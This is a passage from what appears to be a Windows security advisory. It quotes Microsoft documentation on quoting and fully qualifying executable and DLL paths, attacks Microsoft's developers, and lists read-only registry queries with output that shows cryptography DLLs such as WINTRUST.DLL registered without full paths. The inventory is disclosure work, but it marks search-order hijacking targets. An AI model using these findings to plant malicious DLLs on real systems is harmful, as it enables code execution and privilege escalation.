trustworthy computingand
defense in depth.
Note: these well-known weaknesses are documented as CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-73: External Control of File Name or Path, CWE-426: Untrusted Search Path, CWE-427: Uncontrolled Search Path Element and CWE-428: Unquoted Search Path or Element in the CWE™, allowing well-known attacks like CAPEC-13: Subverting Environment Variable Values and CAPEC-471: Search Order Hijacking documented in the CAPEC™.
longfilenames, and despite their own copious documentation, Microsoft still ships Windows with vulnerable command lines missing (double) quotes as well as fully qualified (absolute) pathnames and COM classes registered with vulnerable unqualified filenames.
The cause for the prevalence of these trivial to exploit vulnerabilities are careless, clueless and sloppy developers who are most obviously not aware of any security (implications) as well as their own company’s documentation, plus the total absence of any (serious) quality assurance and supervision!
Use quotation marks when specifying long filenames or paths with spaces.In section
[…]
Note that the quotation marks must be used.
ShellExecute, ShellExecuteEx, and Related Functionsthe MSDN article Security Considerations: Microsoft Windows Shell specifies:
Make sure you provide an unambiguous definition of the application that is to be executed.In section
- When providing the executable file's path, provide the fully qualified path. Do not depend on the Shell to locate the file.
- If you provide a command-line string that contains white space, wrap the string in quotation marks. Otherwise, the parser might interpret a single element that contains spaces as multiple elements.
Security Remarksthe MSDN article WinExec function specifies:
The executable name is treated as the first white space-delimited string in lpCmdLine. If the executable or path name has a space in it, there is a risk that a different executable could be run because of the way the function parses spaces.In section
Shortcut Menu Verbsthe MSDN article Verbs and File Associations specifies:
If any element of the command string contains or might contain spaces, it must be enclosed in quotation marks. Otherwise, if the element contains a space, it will not parse correctly. For instance, "My Program.exe" starts the application properly. If you use My Program.exe without quotation marks, then the system attempts to launch My with Program.exe as its first command line argument. You should always use quotation marks with arguments such as %1 that are expanded to strings by the Shell, because you cannot be certain that the string will not contain a space.In section
Registering an Open Verbthe MSDN article Registering Programs with Client Types specifies:
The command line must specify a fully qualified absolute path to the file, followed by optional command-line options. If the entry type is REG_EXPAND_SZ, environment variables can be used in the path. Use quotation marks appropriately to ensure that spaces in the command line are not misinterpreted.Above section
Security Issuesthe MSDN article Registering an Application to a URI Scheme specifies:
WhenIn sectionShellExecute()
executes the pluggable protocol handler with a string on the command line, any non-encoded spaces, quotes, and backslashes in the URI will be interpreted as part of the command line. This means that if you use C/C++'s argc and argv to determine the arguments passed to your application, the string may be broken across multiple parameters. To mitigate this issue:
- Avoid spaces, quotes, or backslashes in your URI
- Quote the %1 in the registration ("%1" as written in the 'alert' example registration)
Security Remarksthe MSDN article CreateProcess function specifies:
If the executable or path name has a space in it, there is a risk that a different executable could be run because of the way the function parses spaces.In section
Parametersthe MSDN article CreateService function specifies:
At its bottom the MSDN article Self-Registration specifies:
- lpBinaryPathName [in, optional]
- The fully qualified path to the service binary file. If the path contains a space, it must be quoted so that it is correctly interpreted. For example, "d:\\my share\\myservice.exe" should be specified as "\"d:\\my share\\myservice.exe\"".
The server must register the full path to the installation location of the DLL or EXE module for their respective InprocServer32, InprocHandler32, and LocalServer32 keys in the registry.In section
Remarksthe MSDN article DefaultIcon specifies:
This is a REG_SZ value that specifies the full path to the executable name […]In section
Remarksthe MSDN article LocalServer specifies:
Specifies the full path to a 16-bit local server application.In section
Remarksthe MSDN article LocalServer32 specifies:
Specifies the full path to a 32-bit local server application.Note: the MSDN articles InprocHandler, InprocHandler32, InprocServer, InprocServer32 and ToolBoxBitmap32 fail to specify the use of fully qualified (absolute) pathnames and need to be corrected!
[…]
The ServerExecutable value, which is of type REG_SZ and is supported starting with Windows Server 2003, works in conjunction with the LocalServer32 subkey to prevent any ambiguity when using the CreateProcess function. LocalServer32 specifies the location of the COM server application to launch, and this information is passed as the first parameter lpApplicationName for CreateProcess. Depending on the implementation of CreateProcess, this information might be ambiguous. For this reason, if ServerExecutable is specified, COM passes the ServerExecutable named value to the lpApplicationName parameter of CreateProcess. If ServerExecutable is not specified, COM passes NULL as the value for the first parameter of CreateProcess.To help provide system security, use quoted strings in the path to indicate where the executable filename ends and the arguments begin.
Since COM
in-process
handlers and servers are implemented in
DLLs,
the MSDN
article
Dynamic-Link Library Security,
the MSKB
article
2389418,
the Security Advisory
2269637
and the
MSRC
blog post
Load Library Safely
apply too:
Wherever possible, specify a fully qualified path when using the LoadLibrary, LoadLibraryEx, CreateProcess, or ShellExecute functions.
Use fully qualified paths for all calls to LoadLibrary, CreateProcess, and ShellExecute where you can.
This exploit may occur when applications do not directly specify the fully qualified path to a library it intends to load.
Always specify the fully qualified path when the library location is constant.
generalisedsystem images, designed to run from a single hard disk partition with the drive letter
C
assigned. All
directories and files contained within these system images have
fixed, language-independent (path)names and can
neither be relocated nor renamed: see the
MSKB
articles
933700,
949977
and
2787623
for some details. Additionally the vast majority of files are
(nowadays) registered with their absolute (fully qualified) pathname
containing the (fixed) drive letter and the language-independent
directory name, which renders their change or relocation practically
impossible.
The use of environment variables within pathnames serves no (good) purpose, it is not just deprecated and superfluous, but outright dangerous, allowing attacks like those shown below in the first place, and must therefore be avoided and banned!
This holds of course against the use of environment variables in
code too, where functions like
GetAllUsersProfileDirectory()
,
GetComputerName()
,
GetComputerNameEx()
,
GetComputerObjectName()
,
GetProfilesDirectory()
,
GetSystemDirectory()
,
GetSystemWow64Directory()
,
GetUserName()
,
GetUserNameEx()
,
GetUserProfileDirectory()
,
GetWindowsDirectory()
,
SHGetFolderPath()
and
SHGetKnownFolderPath()
are available to get at least the information provided in the
environment variables %ALLUSERSPROFILE%
,
%APPDATA%
, %CommonProgramFiles%
,
%CommonProgramFiles(x86)%
, %COMPUTERNAME%
,
%LOCALAPPDATA%
, %ProgramData%
,
%ProgramFiles%
, %ProgramFiles(x86)%
,
%PUBLIC%
, %SystemDrive%
,
%SystemRoot%
, %USERDOMAIN%
,
%USERNAME%
as well as %USERPROFILE%
, which
should must be used instead of functions like
ExpandEnvironmentStrings()
,
ExpandEnvironmentStringsForUser()
or
GetEnvironmentVariable()
!
longpathnames containing spaces, with unquoted pathnames containing environment variables and with unquoted arguments.
Note: the command lines can be copied and pasted as blocks into the Command Processor window!
Note: offending parts of matching command lines are highlighted in the output.
Note: the search is far from
exhaustive, it covers just the command lines returned from the
FTYPE
command, i.e.
file types
registered with the Verb
Open
, executables
registered with
COM classes,
cryptography providers and Group Policy client side
extensions!
Cryptography providers:
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /REG:64 /S /V "Dll" REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /REG:64 /S /V "$DLL" REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /REG:32 /S /V "Dll" REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /REG:32 /S /V "$DLL"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\AggregateSSLHandshakeTime\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\SecureTimeAggregator.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllLogMismatchPinRules\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\cryptui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\#16 Dll REG_SZ C:\Windows\System32\cryptnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\Ldap Dll REG_SZ C:\Windows\System32\cryptnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllProtectedRootMessageBox\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\cryptui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllProtectPrompt\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\cryptui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\System32\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\System32\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\System32\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\System32\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\System32\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\System32\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\System32\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\System32\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\System32\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\System32\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\System32\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL 